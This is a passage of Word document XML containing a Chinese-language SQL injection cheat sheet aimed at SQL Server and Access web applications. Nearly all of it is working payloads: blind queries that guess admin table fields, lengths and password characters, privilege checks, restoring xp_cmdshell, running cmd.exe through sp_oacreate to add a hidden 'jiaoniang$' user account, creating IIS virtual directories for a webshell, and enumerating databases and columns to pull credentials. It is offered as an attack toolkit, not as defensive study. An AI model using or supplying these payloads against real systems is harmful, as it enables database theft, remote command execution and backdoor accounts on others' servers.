      <w:r w:rsidRPr="001F1794">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;(select count(*) from admin) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1&lt;(select count(*) from admin) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>4.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解字段</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>名称</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">len( ) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>括号里面加上我们想到的字段名称</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where len(*)&gt;0)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where len(</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>用户字段名称</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>name)&gt;0) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where len(</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>密码字段名称</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>password)&gt;0) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>5.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解各个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段的长度</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解长度</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>就是把</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>变换</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>直到返回正确页面为止</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where len(*)&gt;0) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(name)&gt;6) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(name)&gt;5) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>长度是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>6 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(name)=6) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(password)&gt;11) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(password)&gt;12) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>长度是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>12 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(password)=12) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>6.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解字符</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where left(name,1)='a') ---</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解用户帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>的第一位</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where left(name,2)='ab')---</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解用户帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>的第二位</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>就这样一次加一个字符这样猜</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜到够你刚才猜出来的多少位了就对了</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>就算出来了</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>这个查询语句</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>可以猜解中文</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>的用户和密码</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>只要把后面的数字换成中文的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ASSIC</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>码就</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>OK.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>最后把结果再转换成字符</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>看服务器打的补丁</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>出错了打了</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SP4</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>补丁</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>｛ＡＴ｝</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>@VERSION)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>看数据库连接账号的权限，返回正常，证明是服务器角色</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sysadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>权限。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(Select IS_SRVROLEMEMBER('sysadmin'))-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断连接数据库</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>。（采用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>账号连接</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>返回正常</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>证明了连接账号是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 'sa'=(Select System_user)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and user_name()='dbo'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select user_name()-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>看</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>是否删除</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>name = 'xp_cmdshell')-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>被删除，恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>支持绝对路径的恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;EXEC master.dbo.sp_addextendedproc </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>反向</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>PING</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>自己实验</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>加</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>jiaoniang$ 1866574 /add'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>创建一个虚拟目录</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>盘：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@o, 'run', NULL,' cscript.exe c</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\inetpub\wwwroot\mkwebdir.vbs -w "</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>站点</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>" </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>-v "e","e</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\"'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>访问属性：（配合写入一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@o, 'run', NULL,' cscript.exe c</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\inetpub\wwwroot\chaccess.vbs -a </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>w3svc/1/ROOT/e +browse' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>爆库</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>特殊技巧：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">:%5c='\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>或者把</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">\ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>%5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>如何得到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SQLSERVER</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>某个数据库中所有表的表名？</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>-------------------------------------------------------------------------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>用户表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select name from sysobjects where xtype = 'U'; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>系统表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select name from sysobjects where xtype = 'S'; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>所有表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select name from sysobjects where xtype = 'S' or xtype = 'U'; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>-------------------------------------------------------------------------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 paths from newtable)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到库名（从</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>都是系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>以上才可以判断）</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select name from master.dbo.sysdatabases where dbid=7)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from master.dbo.sysdatabases where name&gt;1 and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbid=6) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>依次提交</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> dbid = 7,8,9.... </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到更多的数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>&gt;(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">select top 1 name from bbs.dbo.sysobjects where xtype='U') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>暴到一个表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>假设为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">not in ('Admin')) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>来得到其他的表。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from bbs.dbo.sysobjects where xtype='U' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>name='admin' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and uid&gt;(str(id))) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>暴到</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的数值假设为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>18779569 uid=id </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 name from bbs.dbo.syscolumns where id=18779569) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的一个字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>假设为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> user_id </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 name from bbs.dbo.syscolumns where id=18779569 and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>name not in </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">('id',...)) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>来暴出其他的字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 0&lt;(select user_id from BBS.dbo.admin where username&gt;1) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>可以得到用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>依次可以得到密码。。。。。假设存在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">user_id username ,password </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>等字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from master.dbo.sysdatabases where name&gt;1 and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbid=6) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 0&lt;&gt;(select top 1 name from bbs.dbo.sysobjects where xtype='U') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>not in('Address')) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from bbs.dbo.sysobjects where xtype='U' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">name='admin' and uid&gt;(str(id))) </w:t>
      </w:r>
